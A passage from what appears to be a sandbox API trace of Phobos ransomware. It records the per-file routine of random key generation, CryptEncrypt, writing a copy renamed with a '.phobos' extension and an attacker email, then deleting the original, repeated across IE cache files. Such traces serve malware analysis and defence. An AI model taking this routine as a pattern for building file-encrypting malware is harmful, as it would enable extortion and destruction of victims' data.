dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0168.242] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\index.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\content.ie5\\index.dat"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x158 [0168.243] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=65536) returned 1 [0168.243] CloseHandle (hObject=0x158) returned 1 [0168.243] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\index.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\content.ie5\\index.dat")) returned 0x2026 [0168.243] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\index.dat.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\content.ie5\\index.dat.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0168.243] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\index.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\content.ie5\\index.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x158 [0168.243] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0168.243] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0168.243] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\index.dat.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\content.ie5\\index.dat.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0168.244] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32ce8) returned 1 [0168.244] CryptSetKeyParam (hKey=0xa32ce8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0168.244] ReadFile (in: hFile=0x158, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x10000, lpOverlapped=0x0) returned 1 [0168.261] CryptEncrypt (in: hKey=0xa32ce8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x10010, dwBufLen=0x10010 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x10010) returned 1 [0168.261] WriteFile (in: hFile=0x190, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x10010, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x10010, lpOverlapped=0x0) returned 1 [0168.263] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32d28) returned 1 [0168.263] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0168.263] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0168.263] CryptDestroyKey (hKey=0xa32d28) returned 1 [0168.263] WriteFile (in: hFile=0x190, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0168.263] CryptDestroyKey (hKey=0xa32ce8) returned 1 [0168.263] CloseHandle (hObject=0x158) returned 1 [0168.264] CloseHandle (hObject=0x190) returned 1 [0168.264] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\index.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\content.ie5\\index.dat")) returned 1 [0168.265] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0168.265] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\MM5O9XQS\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\content.ie5\\mm5o9xqs\\desktop.ini"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0168.266] GetFileSizeEx (in: hFile=0x190, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=67) returned 1 [0168.266] CloseHandle (hObject=0x190) returned 1 [0168.267] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\MM5O9XQS\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\content.ie5\\mm5o9xqs\\desktop.ini")) returned 0x2026 [0168.267] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\MM5O9XQS\\desktop.ini.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\content.ie5\\mm5o9xqs\\desktop.ini.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0168.267] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\MM5O9XQS\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\content.ie5\\mm5o9xqs\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0168.267] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0168.267] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0168.267] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\MM5O9XQS\\desktop.ini.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\content.ie5\\mm5o9xqs\\desktop.ini.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x158 [0168.268] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32ce8) returned 1 [0168.268] CryptSetKeyParam (hKey=0xa32ce8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0168.268] ReadFile (in: hFile=0x190, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x43, lpOverlapped=0x0) returned 1 [0168.269] CryptEncrypt (in: hKey=0xa32ce8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x50, dwBufLen=0x50 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x50) returned 1 [0168.269] WriteFile (in: hFile=0x158, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x50, lpOverlapped=0x0) returned 1 [0168.270] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32d28) returned 1 [0168.270] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0168.270] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0168.270] CryptDestroyKey (hKey=0xa32d28) returned 1 [0168.270] WriteFile (in: hFile=0x158, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0168.270] CryptDestroyKey (hKey=0xa32ce8) returned 1 [0168.270] CloseHandle (hObject=0x190) returned 1 [0168.270] CloseHandle (hObject=0x158) returned 1 [0168.270] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\MM5O9XQS\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\content.ie5\\mm5o9xqs\\desktop.ini")) returned 1 [0168.271] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0168.271] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\PMMR5K9K\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\content.ie5\\pmmr5k9k\\desktop.ini"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x158 [0168.273] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=67) returned 1 [0168.273] CloseHandle (hObject=0x158) returned 1 [0168.273] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\PMMR5K9K\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\content.ie5\\pmmr5k9k\\desktop.ini")) returned 0x2026 [0168.273] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\PMMR5K9K\\desktop.ini.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\content.ie5\\pmmr5k9k\\desktop.ini.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0168.273] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\PMMR5K9K\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\content.ie5\\pmmr5k9k\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x158 [0168.274] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0168.274] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0168.274] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\PMMR5K9K\\desktop.ini.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\content.ie5\\pmmr5k9k\\desktop.ini.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0168.274] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32ce8) returned 1 [0168.274] CryptSetKeyParam (hKey=0xa32ce8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0168.274] ReadFile (in: hFile=0x158, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x43, lpOverlapped=0x0) returned 1 [0168.275] CryptEncrypt (in: hKey=0xa32ce8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x50, dwBufLen=0x50 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x50) returned 1 [0168.275] WriteFile (in: hFile=0x190, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x50, lpOverlapped=0x0) returned 1 [0168.276] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32d28) returned 1 [0168.276] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0168.276] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0168.276] CryptDestroyKey (hKey=0xa32d28) returned 1 [0168.276] WriteFile (in: hFile=0x190, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0168.277] CryptDestroyKey (hKey=0xa32ce8) returned 1 [0168.277] CloseHandle (hObject=0x158) returned 1 [0168.277] CloseHandle (hObject=0x190) returned 1 [0168.277] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\PMMR5K9K\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\content.ie5\\pmmr5k9k\\desktop.ini")) returned 1 [0168.278] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0168.278] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\RIJUQL1C\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\content.ie5\\rijuql1c\\desktop.ini"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0168.279] GetFileSizeEx (in: hFile=0x190, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=67) returned 1 [0168.279] CloseHandle (hObject=0x190) returned 1 [0168.279] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\RIJUQL1C\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\content.ie5\\rijuql1c\\desktop.ini")) returned 0x2026 [0168.279] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\RIJUQL1C\\desktop.ini.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\content.ie5\\rijuql1c\\desktop.ini.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0168.279] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\RIJUQL1C\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\content.ie5\\rijuql1c\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0168.279] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0168.279] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0168.279] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\RIJUQL1C\\desktop.ini.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\content.ie5\\rijuql1c\\desktop.ini.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x158 [0168.282] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32ce8) returned 1 [0168.282] CryptSetKeyParam (hKey=0xa32ce8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0168.282] ReadFile (in: hFile=0x190, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x43, lpOverlapped=0x0) returned 1 [0168.283] CryptEncrypt (in: hKey=0xa32ce8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x50, dwBufLen=0x50 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x50) returned 1 [0168.283] WriteFile (in: hFile=0x158, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x50, lpOverlapped=0x0) returned 1 [0168.284] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32d28) returned 1 [0168.284] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0168.284] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0168.284] CryptDestroyKey (hKey=0xa32d28) returned 1 [0168.284] WriteFile (in: hFile=0x158, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0168.284] CryptDestroyKey (hKey=0xa32ce8) returned 1 [0168.284] CloseHandle (hObject=0x190) returned 1 [0168.285] CloseHandle (hObject=0x158) returned 1 [0168.285] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\RIJUQL1C\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\content.ie5\\rijuql1c\\desktop.ini")) returned 1 [0168.286] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0168.286] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\X9OHK109\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\content.ie5\\x9ohk109\\desktop.ini"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x158 [0168.287] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=67) returned 1 [0168.287] CloseHandle (hObject=0x158) returned 1 [0168.287] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\X9OHK109\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\content.ie5\\x9ohk109\\desktop.ini")) returned 0x2026 [0168.287] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\X9OHK109\\desktop.ini.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\content.ie5\\x9ohk109\\desktop.ini.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0168.288] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\X9OHK109\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\content.ie5\\x9ohk109\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x158 [0168.288] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0168.288] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0168.288] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\X9OHK109\\desktop.ini.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\content.ie5\\x9ohk109\\desktop.ini.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0168.288] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32ce8) returned 1 [0168.288] CryptSetKeyParam (hKey=0xa32ce8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0168.288] ReadFile (in: hFile=0x158, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x43, lpOverlapped=0x0) returned 1 [0168.289] CryptEncrypt (in: hKey=0xa32ce8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x50, dwBufLen=0x50 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x50) returned 1 [0168.289] WriteFile (in: hFile=0x190, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x50, lpOverlapped=0x0) returned 1 [0168.290] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32d28) returned 1 [0168.290] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0168.291] CryptEncrypt (in: 